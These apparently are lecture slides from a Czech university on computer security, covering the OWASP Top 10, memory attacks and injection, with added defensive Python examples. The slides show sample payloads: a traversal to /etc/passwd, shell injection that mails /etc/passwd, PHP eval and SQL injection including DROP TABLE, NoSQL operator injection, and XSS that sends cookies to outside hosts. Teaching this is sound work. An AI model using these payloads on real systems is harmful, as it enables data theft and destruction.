Security in Computer Systems

Miroslav Burša, BEAT Research Group, CIIRC CTU in Prague, Czech Technical University in Prague
20 March 2017



Outline

Introduction: overview, motivation
Models: overview, CIA triad, types of controls, access control, risk management
Basic attacks: introduction, OWASP Top Ten, OWASP Top Ten Mobile, overview, pricing, vulnerable medical devices
Secure systems: overview of technologies, principles, prevention, testing
Conclusion: from home, general remarks, discussion

Motivation

CNN? [Figure: Have you seen it...?]

03/2017: Phishing [Figure: the address line]

Phishing

[Figure: Image 1] [Figure: Image 2]
Easy to build: two pictures, one form, a little JavaScript.

[Figure: Source code]
[Figure: Next step]
[Figure: Next step, detail]
[Figure: And we're back...]

Nigerian scam (March 2017) [Figure: Free money...?]

IT Helpdesk (March 2017)

[Figure: Phishing, social engineering]
[Figure: Secure...?]
[Figure: admin Office Help-Desk]

Displayed link: http://mkrspc.se/9D
Actual link: http://www.google.com/url?q=http%3A%2F%2Fmkrspc.se%2F9D&sa=D&sntz=1&usg=AFQjCNGLa70cIgORZk-w-Qv7RpNCB1S4Eg
The link redirects automatically. Guess why this approach has been used... (The hostname the victim, the mail client and any URL filter see is www.google.com; the real destination travels in the q= parameter of Google's redirector.)

[Figure: Password displayed in cleartext]
[Figure: ...even for non-matching passwords, even for a blank form...]
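When triaging a mail like this, the first question is where the link really goes. The following is an added example (not part of the slides) that peels nested redirector wrappers such as the google.com/url?q=... link above and reports the host the victim lands on. The parameter names other than q are assumed, not a complete list:

```python
from urllib.parse import parse_qs, urlsplit

# Query parameters that redirector endpoints commonly use to carry the real
# destination. "q" is what www.google.com/url uses in the mail above; the
# other names are assumptions for illustration.
REDIRECT_PARAMS = ("q", "url", "u", "redirect", "target", "dest")


def unwrap_redirect(url, max_hops=5):
    """Return the chain of URLs hidden inside (possibly nested) redirector
    links, outermost first. Stops when no further absolute URL is found."""
    chain = [url]
    for _ in range(max_hops):
        # parse_qs already percent-decodes the values, so the wrapped URL
        # comes out as plain text: "http://mkrspc.se/9D".
        params = parse_qs(urlsplit(chain[-1]).query)
        inner = None
        for name in REDIRECT_PARAMS:
            for value in params.get(name, []):
                if urlsplit(value).scheme in ("http", "https"):
                    inner = value
                    break
            if inner:
                break
        if inner is None or inner == chain[-1]:
            break
        chain.append(inner)
    return chain


def final_host(url):
    """Hostname the victim actually ends up on."""
    return urlsplit(unwrap_redirect(url)[-1]).hostname or ""


# The link quoted from the March 2017 helpdesk mail above.
MAIL_LINK = ("http://www.google.com/url?q=http%3A%2F%2Fmkrspc.se%2F9D"
             "&sa=D&sntz=1&usg=AFQjCNGLa70cIgORZk-w-Qv7RpNCB1S4Eg")

if __name__ == "__main__":
    for hop in unwrap_redirect(MAIL_LINK):
        print(hop)
    print("final host:", final_host(MAIL_LINK))
```

Blocklists and reputation checks should be applied to the final host, not to the outer one; the whole point of the wrapper is that the outer host is trusted.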

Skimming device [Figure: Find the difference]

An average day... [Figure: motivational image, Check Point Security Report 2016]

- Every 4 s: an unknown malware is downloaded
- Every 5 s: a host accesses a malicious website
- Every 30 s: a threat emulation event occurs
- Every 53 s: a bot communicates with its C&C server
- Every 81 s: a known malware is downloaded
- Every 4 min: a high-risk application is used
- Every 32 min: sensitive data is sent outside the organization

Security

[Figure: motivational image]

"The riskiest thing we can do is just maintain the status quo."
- Bob Iger, businessman, chairman/CEO of The Walt Disney Company

"Status quo, you know, is Latin for 'the mess we're in'."
- Ronald Reagan, actor and former President of the United States

"There is no such thing as perfect security, only varying levels of insecurity."
- Salman Rushdie, author

Where are you? [Figure: I must be somewhere...]

Models

Computer security models

- Access control list (ACL)
- Capability-based security
- Multi-level security (MLS)
- Role-based access control (RBAC)
- Lattice-based access control (LBAC)
- Bell-LaPadula model
- Biba model
- Clark-Wilson model
- Graham-Denning model
- Take-grant protection model
- Object-capability model
- ...

CIA triad

[Figure: The CIA (AIC) triad]

A model designed to guide information-security policy within an organization.

- Confidentiality (privacy): sensitive data is accessible only to authorized people. Example violation: shoulder surfing.
- Integrity: data cannot be created, modified or deleted without authorization; trustworthiness and consistency are preserved. Example violation: a power failure that corrupts data in the middle of a write.
- Availability: the information, the systems that process it and the security controls that protect it are available when needed (redundancy (RAID), failover, HA, DRP*).

* DRP: disaster recovery plan

Types of controls

- Administrative: written rules: policies, procedures, guidelines, standards
- Logical (technical): monitoring and controlling access to information (passwords, firewalls, IDS, ACLs, ...); the principle of least privilege (think of everyday work under the Windows Administrator account) vs. BYOD, BYOA
- Physical: monitoring and control within workplaces and data centres (locks, doors, alarms, cameras, guards, ...)
- Separation of duties

Information classification

- Protection depends on the value of the information
- Depends on the application domain
- The meaning of each classification level must be quantified
- Employees and partners must be trained

Examples:
- Commercial sector: public / sensitive / private / confidential
- Government sector: unclassified, sensitive but unclassified, confidential, secret, top secret

Access control

Information may be accessible only to authorized persons.

- Identification: "Hello, my name is John Doe" (username)
- Authentication: verifying that the person really is John Doe (password)
  - something you know
  - something you have
  - something you are
- Authorization: the rights to access information (user roles, RADIUS, Kerberos, ...)
- Accounting (auditing): the log records must not be modifiable

The strength of any system is no greater than its weakest link. [Figure: Access control]
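The last bullet (audit records must not be modifiable) is usually met by chaining every record to its predecessor with a keyed hash, so that editing or deleting an entry breaks every tag after it. The following is an added example, not from the slides; the key, record layout and the three sample events are assumptions for illustration (in a deployment the key sits on a separate log host or HSM, not next to the log):

```python
import hashlib
import hmac
import json

# Assumed: in production this key is not readable by the host that writes
# the log, otherwise an intruder can simply re-chain the log after editing.
AUDIT_KEY = b"example-only-audit-key"
GENESIS = b"\x00" * 32


def _tag(prev_tag, record):
    """HMAC over the previous tag and a canonical encoding of the record."""
    payload = json.dumps(record, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(AUDIT_KEY, prev_tag + payload, hashlib.sha256).digest()


def append(log, record):
    """Append a record whose tag covers the record and the previous tag."""
    prev = log[-1]["tag"] if log else GENESIS
    log.append({"record": record, "tag": _tag(prev, record)})


def verify(log):
    """Return the index of the first entry whose tag does not match, or -1
    if the chain is intact."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if not hmac.compare_digest(entry["tag"], _tag(prev, entry["record"])):
            return i
        prev = entry["tag"]
    return -1


def sample_log():
    """Constructed events for the demo."""
    log = []
    append(log, {"t": 1, "user": "jdoe", "action": "login", "ok": True})
    append(log, {"t": 2, "user": "jdoe", "action": "read", "obj": "payroll.xlsx"})
    append(log, {"t": 3, "user": "jdoe", "action": "logout"})
    return log
```

The chain detects modification and deletion in the middle, but not silently dropping the newest entries; for that, the latest tag must periodically be anchored somewhere the attacker cannot reach (a remote log server, a signed timestamp, a write-once medium).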

Risk management

- Risk: the probability that a harmful action occurs
- Vulnerability: a weakness that can be exploited to threaten or cause damage
- Threat: something with the potential to cause damage
- Not all risk can be eliminated: residual risk
- Disaster recovery planning

Think twice before you act.

Security risks, an example [Figure: Security risks (e-shop)]

Basic attacks

OWASP Top 10 Risks

The OWASP Top 10 Web Application Security Risks for 2013:
A1 Injection
A2 Broken Authentication and Session Management
A3 Cross-Site Scripting (XSS)
A4 Insecure Direct Object References
A5 Security Misconfiguration
A6 Sensitive Data Exposure
A7 Missing Function Level Access Control
A8 Cross-Site Request Forgery (CSRF)
A9 Using Components with Known Vulnerabilities
A10 Unvalidated Redirects and Forwards

Source: owasp.org

A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

Source: owasp.org
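The classic instance is a login query built by string concatenation. The following is an added example (not from the slides) showing the vulnerable form beside the parameterised one against an in-memory SQLite table with one constructed row; passwords are compared in clear only to keep the query readable, which is itself a Sensitive Data Exposure issue (A6):

```python
import sqlite3


def _db():
    """In-memory users table with one constructed row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return con


def login_vulnerable(con, name, password):
    # A1: untrusted input is pasted into the SQL text, so a quote in the
    # input changes the structure of the statement.
    sql = (f"SELECT 1 FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, name, password):
    # Parameterised query: the values are bound after parsing and can never
    # become SQL code, whatever characters they contain.
    sql = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone() is not None


def demo():
    """Run both variants with a real password and with a bypass payload."""
    con = _db()
    payload = "' OR '1'='1"   # turns the WHERE clause into ... OR '1'='1'
    return {
        "legit_vulnerable": login_vulnerable(con, "alice", "correct horse"),
        "bypass_vulnerable": login_vulnerable(con, "alice", payload),
        "legit_safe": login_safe(con, "alice", "correct horse"),
        "bypass_safe": login_safe(con, "alice", payload),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:18s} -> {'logged in' if ok else 'rejected'}")
```

The same rule applies to OS command and LDAP interpreters: pass data through an API that keeps it separate from the command (argument lists instead of a shell string, escaped LDAP filters) rather than trying to sanitise the characters yourself.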

A2 – Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.

Source: owasp.org

A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

Source: owasp.org
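The escaping has to match the context the data lands in. The following is an added example, not from the slides, rendering a constructed comment into both an element body and an attribute value: the unsafe renderer lets a script tag through in the body and lets an attribute be closed early, the safe one escapes quotes as well as angle brackets. The markup and sample inputs are assumptions:

```python
import html


def render_comment_unsafe(author, text):
    # A3: untrusted strings dropped straight into HTML.
    return f'<div class="comment" data-author="{author}">{text}</div>'


def render_comment_safe(author, text):
    # quote=True also turns ' and " into entities, which is what keeps the
    # attribute value from being terminated by the input.
    a = html.escape(author, quote=True)
    t = html.escape(text, quote=True)
    return f'<div class="comment" data-author="{a}">{t}</div>'


def breaks_out(fragment):
    """True if the input managed to open a tag or a new attribute."""
    low = fragment.lower()
    return "<script" in low or '" onmouseover=' in low


# Constructed inputs: a harmless one, a body payload, an attribute payload.
SAMPLES = [
    ("bob", "nice post"),
    ("mallory", "<script>fetch('//evil.example/?c=' + document.cookie)</script>"),
    ('x" onmouseover="alert(1)', "hi"),
]


def demo():
    """(unsafe_broke_out, safe_broke_out) for every sample."""
    return [(breaks_out(render_comment_unsafe(a, t)),
             breaks_out(render_comment_safe(a, t))) for a, t in SAMPLES]


if __name__ == "__main__":
    for (a, t), result in zip(SAMPLES, demo()):
        print(result, render_comment_safe(a, t))
```

HTML-entity escaping is correct for element bodies and quoted attributes only; data placed inside a script block, a URL or a CSS value needs that context's own encoding, and a Content-Security-Policy header limits the damage when one spot is missed.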

A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

Source: owasp.org

A5 – Security Misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

Source: owasp.org

A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

Source: owasp.org

A7 – Missing Function Level Access Control

Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

Source: owasp.org
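A4 and A7 are the same mistake at two granularities: trusting the id in the URL (object level) and trusting that a hidden button is enough (function level). The following is an added example, not from the slides, with a constructed invoice store and role table; it shows the IDOR lookup beside a handler that checks ownership, and a delete function that enforces the admin role on the server regardless of what the UI showed:

```python
from dataclasses import dataclass


@dataclass
class Invoice:
    id: int
    owner: str
    amount: int


# Constructed data; in a real application these are database rows.
INVOICES = {
    101: Invoice(101, "alice", 120),
    102: Invoice(102, "bob", 9900),
}
ROLES = {"alice": {"user"}, "bob": {"user"}, "carol": {"user", "admin"}}


class Forbidden(Exception):
    pass


def get_invoice_idor(user, invoice_id):
    # A4: the key from the URL is used as-is; any logged-in user can walk
    # through /invoice/101, /invoice/102, ... and read everyone's data.
    return INVOICES[invoice_id]


def get_invoice(user, invoice_id):
    inv = INVOICES.get(invoice_id)
    # Object-level check on every request: the caller must own the object
    # or hold a role that is allowed to see all of them. "Not found" and
    # "not yours" are reported identically so ids cannot be enumerated.
    if inv is None or (inv.owner != user and "admin" not in ROLES.get(user, ())):
        raise Forbidden(f"{user} may not access invoice {invoice_id}")
    return inv


def delete_invoice(user, invoice_id):
    # A7: the UI hides the Delete button from non-admins, but a forged
    # request reaches this function anyway, so the role is checked here.
    if "admin" not in ROLES.get(user, ()):
        raise Forbidden(f"{user} is not allowed to delete invoices")
    return INVOICES.pop(invoice_id)


if __name__ == "__main__":
    print("IDOR:", get_invoice_idor("alice", 102))      # bob's invoice leaks
    try:
        get_invoice("alice", 102)
    except Forbidden as e:
        print("blocked:", e)
```

Frameworks usually let this live in one place (a decorator or middleware that loads the object and checks the policy) so that a handler cannot forget it; the check still has to be per object and per function, not per page.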

A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

Source: owasp.org
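The standard fix is a synchronizer token: a secret value tied to the session that must be present in the request body, which a cross-site page cannot read or forge. The following is an added example, not from the slides; the endpoint, the session ids and the form layout are assumptions for illustration:

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; generated fresh here so the example is self-contained.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id):
    """Token bound to the session: HMAC(secret, session id). The server
    embeds it as a hidden field in every state-changing form it renders."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, submitted):
    if not submitted:
        return False
    # Constant-time comparison, so the token cannot be guessed byte by byte.
    return hmac.compare_digest(csrf_token(session_id), submitted)


def transfer(session_cookie, form):
    """State-changing endpoint. The browser attaches the session cookie by
    itself (that is what CSRF abuses); the token must come from the form
    body, which only our own pages can have filled in."""
    if not verify_csrf(session_cookie, form.get("csrf")):
        return "403 rejected: missing or wrong CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


def demo():
    """Constructed scenario: the victim's own form, an attacker page that
    auto-submits without a token, and one that reuses the attacker's token."""
    victim, attacker = "sess-victim", "sess-attacker"
    return {
        "legit": transfer(victim, {"amount": 100, "to": "bob",
                                   "csrf": csrf_token(victim)}),
        "forged_no_token": transfer(victim, {"amount": 5000, "to": "mallory"}),
        "forged_foreign_token": transfer(victim, {"amount": 5000, "to": "mallory",
                                                  "csrf": csrf_token(attacker)}),
    }
```

Setting the session cookie with SameSite=Lax or Strict stops most cross-site submissions as well, but the token remains the control that does not depend on browser behaviour; state changes must also never be accepted over GET, since a plain image tag would trigger them.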

A9 – Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.

Source: owasp.org

A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

Source: owasp.org
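The usual "next=" parameter after login is the textbook case, and the same weakness is what made the google.com/url redirector useful to the helpdesk phisher earlier. The following is an added example, not from the slides, of validating such a parameter against an allowlist of hosts while handling the inputs that defeat naive checks (protocol-relative //host, backslashes, user@host confusion, non-http schemes). The site name and allowed hosts are assumptions:

```python
from urllib.parse import urljoin, urlsplit

SITE = "https://shop.example"                       # assumed own origin
ALLOWED_HOSTS = {"shop.example", "help.shop.example"}


def safe_redirect_target(next_param, default="/"):
    """Return an absolute URL on an allowed host, or the default."""
    # Backslashes are treated as slashes by browsers, and CR/LF/NUL would
    # let the value inject headers; reject them outright.
    if not next_param or any(c in next_param for c in "\\\r\n\x00"):
        return default
    # Resolve against our own origin so a relative path stays local and a
    # protocol-relative "//evil.example" becomes an absolute URL we can inspect.
    absolute = urljoin(SITE + "/", next_param)
    parts = urlsplit(absolute)
    # Exact host match: "shop.example.evil.example" must not pass a
    # startswith()-style check.
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return default
    # "https://shop.example@evil.example/" parses with evil.example as host
    # and shop.example as the username; refuse any userinfo at all.
    if parts.username or parts.password:
        return default
    return absolute


if __name__ == "__main__":
    for candidate in ["/account", "//evil.example/x",
                      "https://shop.example@evil.example/",
                      "https://shop.example.evil.example/",
                      "javascript:alert(1)", "/\\evil.example",
                      "https://help.shop.example/faq"]:
        print(f"{candidate!r:45s} -> {safe_redirect_target(candidate)}")
```

Where redirects to arbitrary external sites are a genuine requirement, map them through server-side ids (next=3 looked up in a table) instead of accepting a URL, which removes the parsing problem entirely.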

Page 61: Security in Computer Systems - cvut.cz · Security in Computer Systems Miroslav Burša1 1BEAT Research Group CIIRC CTU in Prague Czech Technical University in Prague 20. bˇrezna

ÚvodModely

Základní útokySecure systems

Záver

OWASP Top TenOWASP Top Ten MobilePrehledPricingVulnerable Medical Devices

OWASP Top 10 Mobile Risks

The OWASP Top 10 Mobile Security Risks, 2014, v1.0:

- A1 Weak Server Side Controls
- A2 Insecure Data Storage
- A3 Insufficient Transport Layer Protection
- A4 Unintended Data Leakage
- A5 Poor Authorization and Authentication
- A6 Broken Cryptography
- A7 Client Side Injection
- A8 Security Decisions Via Untrusted Inputs
- A9 Improper Session Handling
- A10 Lack of Binary Protections

Source: owasp.org

Page 62

Basic attacks

- Stack overflow

Figure: source: http://usenix.org/.../sec98/.../cowan

Page 63

Basic attacks: Buffer overrun

Figure: source: http://faculty.cs.tamu.edu/bettati/Courses/410/2006A/..._overview.html

Page 64

Basic attacks

- Stack overflow
- Stack smashing (canaries: terminator, random, random XOR)
- Return-to-libc attack
- Aims at executing so-called shellcode
- Memory protection: W∧X (OpenBSD), NX (Windows)
- Heap overflow
- Integer overflow/underflow


Page 71

Integer over/underflow

Figure: source: Wikipedia

- e.g. ./read_n_bytes '6' 'abcd'; what if we use '-1'...?
- 30 April 2015, the FAA (Federal Aviation Authority) announced it will order Boeing 787 operators to reset its electrical system periodically, to avoid an integer overflow which could lead to loss of electrical power and ram air turbine deployment, and Boeing is going to deploy a software update in the fourth quarter. The EASA (European Aviation Safety Agency) followed on 4 May 2015. The error happens after 2^31 centiseconds (248.55134814815 days), indicating a 32-bit signed integer.


Page 73

Basic attacks

- Stack overflow
- Stack smashing (canaries: terminator, random, random XOR)
- Return-to-libc attack
- Aims at executing so-called shellcode
- Memory protection: W∧X (OpenBSD), NX (Windows)
- Heap overflow
- Integer overflow/underflow
- Directory traversal
  - ../../../../../../../../../etc/passwd
- DoS, DDoS (IoUT, IoST), Slow Loris


Page 75

DoS recovery

Figure: source: pinterest.com/itpie/it-jokes/


Page 77

Basic attacks

- Format string attack
  - printf("%s", buf), printf("%s")
- Permissions hacking
- Race conditions
  - Spirit Rover
  - TOCTTOU


Page 79

Basic attacks (race conditions)

Example:

Figure: XOR race condition

Page 80

Basic attacks (race conditions)

Example:

Figure: Spirit Rover (filesystem full)


Page 82

TOCTTOU

- Time-of-check-to-time-of-use
- race conditions

    if (access(file, R_OK) != 0) {
        exit(1);
    }
    /* race window: the object named by `file` can be replaced here,
       between the check and the use */
    fd = open(file, O_RDONLY);
    // do something with the file descriptor fd...
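The same check-then-use pair next to the usual fix, as an added Python example (not the lecture's code): the hardened version opens first and then validates the descriptor it got with fstat(), so the check applies to the very object that is used. The temporary file, the symlink and the owner check are constructed for the demonstration.

```python
"""Check-then-use (TOCTTOU) on files versus checking the opened handle.

Added example, not from the slides.  open_check_then_use() mirrors the
slide's access()/open() pair; open_then_validate() is the standard fix:
open first, refuse symlinks, then inspect the descriptor with fstat().
"""
import os
import stat
import tempfile


def open_check_then_use(path):
    """Vulnerable pattern from the slide: the name `path` is resolved twice,
    so whatever it refers to can change between access() and open()."""
    if not os.access(path, os.R_OK):
        raise PermissionError(path)
    return os.open(path, os.O_RDONLY)   # may not be the file that was checked


def open_then_validate(path, expected_uid=None):
    """Hardened: open first (no symlink following), then check the object
    actually opened.  The check and the use refer to the same descriptor."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError(f"{path}: not a regular file")
        if expected_uid is not None and st.st_uid != expected_uid:
            raise PermissionError(f"{path}: unexpected owner {st.st_uid}")
    except Exception:
        os.close(fd)
        raise
    return fd


def demo():
    """Constructed scenario: a regular file plus a symlink pointing at it.
    Returns (regular_ok, symlink_rejected, check_then_use_follows_symlink)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "data.txt")
        with open(target, "w") as f:
            f.write("secret\n")
        link = os.path.join(d, "link.txt")
        os.symlink(target, link)

        fd = open_then_validate(target, expected_uid=os.getuid())
        regular_ok = os.read(fd, 16) == b"secret\n"
        os.close(fd)

        try:
            open_then_validate(link)
            symlink_rejected = False
        except OSError:                # ELOOP from O_NOFOLLOW
            symlink_rejected = True

        # The check-then-use version follows the link without noticing:
        # access() and open() were never guaranteed to see the same object.
        fd = open_check_then_use(link)
        follows = os.read(fd, 16) == b"secret\n"
        os.close(fd)
        return regular_ok, symlink_rejected, follows
```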


Page 84

A human trap

Social hacking

Figure: source: pinterest.com/itpie/it-jokes/

Page 85

Code injection: Shell

In languages that do not require strict use of types

- Injecting malicious code
- Injecting whole commands
- Example: Guestbook
  - ; cat /etc/passwd | [email protected]

Page 86

Code injection: PHP

    $myvar = "varname";
    $x = $_GET['arg'];
    eval("\$myvar = \$x;");

Argument:

    "10 ; system(\"/bin/echo uh-oh\");"


Page 88

Code injection: PHP

    if ( isset( $_GET['COLOR'] ) )
        $color = $_GET['COLOR'];
    require( $color . '.php' );

Page 89

Code injection: SQL

    "SELECT * FROM users WHERE name = '" + userName + "';"

Input:

    a' or 't'='t

Resulting query:

    SELECT * FROM users WHERE name = 'a' or 't'='t';

- (abuse: the user check always passes)


Page 92

Code injection: SQL

    "SELECT * FROM users WHERE name = '" + userName + "';"

Input:

    a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%

Resulting query:

    SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '%';


Page 94

Code injection: SQL

    "SELECT * FROM data WHERE id = " + a_variable + ";"

Input:

    1;DROP TABLE users

Resulting query:

    SELECT * FROM data WHERE id = 1;DROP TABLE users;

- (protection: strong type checking)


Page 97

Code injection: SQL

Figure: source: xkcd.com

Page 98

Defence against SQL injection

- Prepared statements, removal of literals

Page 99

Removal of literals

Before removal:

    SELECT * FROM USER WHERE NAME='Smith'
    SELECT * FROM ITEMS WHERE USERID=2

After removal:

    SELECT * FROM USER WHERE NAME=?
    SELECT * FROM ITEMS WHERE USERID=?
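The three SQL injection slides above and the two defences on this one (literal removal with bound parameters, strong type checking of the id), run end to end as an added Python example that is not part of the lecture. SQLite from the standard library stands in for the database; the tables, rows and column names are constructed for the demonstration.

```python
"""String-built SQL versus parameterised SQL, on the slides' own inputs.

Added example, not from the lecture.  The ':memory:' SQLite database and
its two tables are constructed here so the code runs offline.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "pw1"), ("bob", "pw2")])
    db.execute("CREATE TABLE data (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO data VALUES (?, ?)", [(1, "one"), (2, "two")])
    return db


def find_user_concat(db, user_name):
    """The slide's pattern: the literal is built by string concatenation,
    so a quote in the input ends the literal and the rest becomes SQL."""
    sql = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return db.execute(sql).fetchall()


def find_user_prepared(db, user_name):
    """Literal removed, value bound as a parameter: the input is data only.
    (Python's sqlite3 also refuses stacked statements in execute(), but
    that is a driver property; other drivers and databases run them.)"""
    return db.execute("SELECT * FROM users WHERE name = ?",
                      (user_name,)).fetchall()


def find_data_typed(db, a_variable):
    """'Strong type checking' from the slide: the id must be an int before
    it goes near the query, and it is still bound rather than concatenated."""
    if not isinstance(a_variable, int):
        a_variable = int(a_variable)   # ValueError for "1;DROP TABLE users"
    return db.execute("SELECT * FROM data WHERE id = ?",
                      (a_variable,)).fetchall()


def demo():
    """Returns (rows_from_concat, rows_from_prepared, typed_rejected)."""
    db = make_db()
    payload = "a' or 't'='t"             # the slide's input
    bypass = len(find_user_concat(db, payload))     # 't'='t' matches every row
    bound = len(find_user_prepared(db, payload))    # nobody is named that
    try:
        find_data_typed(db, "1;DROP TABLE users")
        typed_rejected = False
    except ValueError:
        typed_rejected = True
    return bypass, bound, typed_rejected
```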


Page 101

Defence against SQL injection

- Prepared statements, removal of literals
- Permissions (GRANT/REVOKE, user roles)
- Stored procedures (type checking)

Page 102

Stored procedures

We have two stored procedures:

    GET_PASSWORD(userName)
    GET_USER(userName, password)

They can be abused:

    GET_USER('admin', '' || GET_PASSWORD('admin') || '')


Page 104

Code injection: NoSQL MongoDB/Node.js

Simple app:

    query.title = ...; query.type = ...
    if (query.type != 'secret') {
        return Document.find(query).exec().json()
    } else return json([])

Example usage:

    {"type" : "blog"}   -> blogs: OK
    {"type" : "secret"} -> empty array: OK

Injection:

    { "type": { "$gte": "" } } -> All documents: Err!

blog.sqreen.io/mongodb-will-not-prevent-nosql-injections-in-your-node-js-app
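Why the operator object slips past the `!= 'secret'` check and matches everything, and the type check that closes it, as an added Python example (not the lecture's or the blog post's code). A tiny in-memory matcher stands in for MongoDB and implements only equality and `$gte`; the sample documents are constructed.

```python
"""MongoDB-style operator injection and a type check that blocks it.

Added example, not from the slides.  matches()/find() emulate just enough
of MongoDB's query semantics (equality and $gte) to show the effect.
"""
DOCS = [  # constructed sample collection
    {"title": "hello", "type": "blog"},
    {"title": "news", "type": "blog"},
    {"title": "keys", "type": "secret"},
]


def matches(doc, query):
    """Mongo-like semantics: a plain value means equality; a dict holds operators."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            for op, arg in cond.items():
                if op == "$gte":
                    if not (isinstance(value, str) and value >= arg):
                        return False
                else:
                    raise ValueError(f"unsupported operator {op}")
        elif value != cond:
            return False
    return True


def find(query):
    return [d for d in DOCS if matches(d, query)]


def handler_vulnerable(query):
    """The slide's handler: it only excludes the literal string 'secret'.
    {"$gte": ""} is a dict, so it is != 'secret' and reaches the database,
    where every string is >= "" and therefore every document matches."""
    if query.get("type") != "secret":
        return find(query)
    return []


def require_strings(query):
    """Type check each user-controlled filter value: strings only.  Objects,
    and with them any $-operator, are rejected before they reach the query."""
    for field, value in query.items():
        if not isinstance(value, str):
            raise TypeError(f"{field}: expected a string, got {type(value).__name__}")
    return query


def handler_hardened(query):
    query = require_strings(query)
    if query.get("type") != "secret":
        return find(query)
    return []


def demo():
    """Returns (blog_count, secret_count, injected_count, hardened_rejected)."""
    blog = len(handler_vulnerable({"type": "blog"}))
    secret = len(handler_vulnerable({"type": "secret"}))
    injected = len(handler_vulnerable({"type": {"$gte": ""}}))
    try:
        handler_hardened({"type": {"$gte": ""}})
        rejected = False
    except TypeError:
        rejected = True
    return blog, secret, injected, rejected
```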


Page 108

Cross-Site Scripting (XSS)

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Page 109

Cross-Site Scripting (XSS)

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Page 110

Web-based attacks

- XSS (Cross-site scripting)
- Cookies (session hijack), sniffing
- Confused deputy, e.g. CSRF (Cross-site request forgery)
- SSL stripping (HSTS: HTTP Strict Transport Security, HPKP: HTTP Public Key Pinning)
- Clickjacking (UI redress), TabNabbing, silent link replacement, custom Find (Ctrl+F) event, ...


Page 113

Other / Nomenclature

- Evil maid attack, cold boot attack
- Scareware, rogueware, malware, adware, spyware, dialer, keylogger, phishing attacks (spear phishing, waterhole attacks), ...
- Ransomware, ...


Page 116

Ransomware (2016, 1 BTC)

Figure: Ransomware example

Figure: Save with MLM ;)

Page 117

Ransomware PopcornTime (2016, 1 BTC)

Figure: Save with MLM ;)

Page 118

Ransomware

The Q3 2016 Malware Review study by PhishMe reports the following main trends in phishing e-mails: 97% of them are associated with some form of ransomware distribution, while only 3% distribute entirely different malware, mainly various forms of "silent" infection designed to operate unnoticed in organisations for as long as possible and collect data.

Page 119

Other / Nomenclature

- Evil maid attack, cold boot attack
- Scareware, rogueware, malware, adware, spyware, dialer, keylogger, phishing attacks (spear phishing, waterhole attacks), ...
- Ransomware, CaaS (Crimeware as a Service)
- Side channel attacks, timing attacks
- MITM attacks, SSL stripping
- ROP, emulation detection
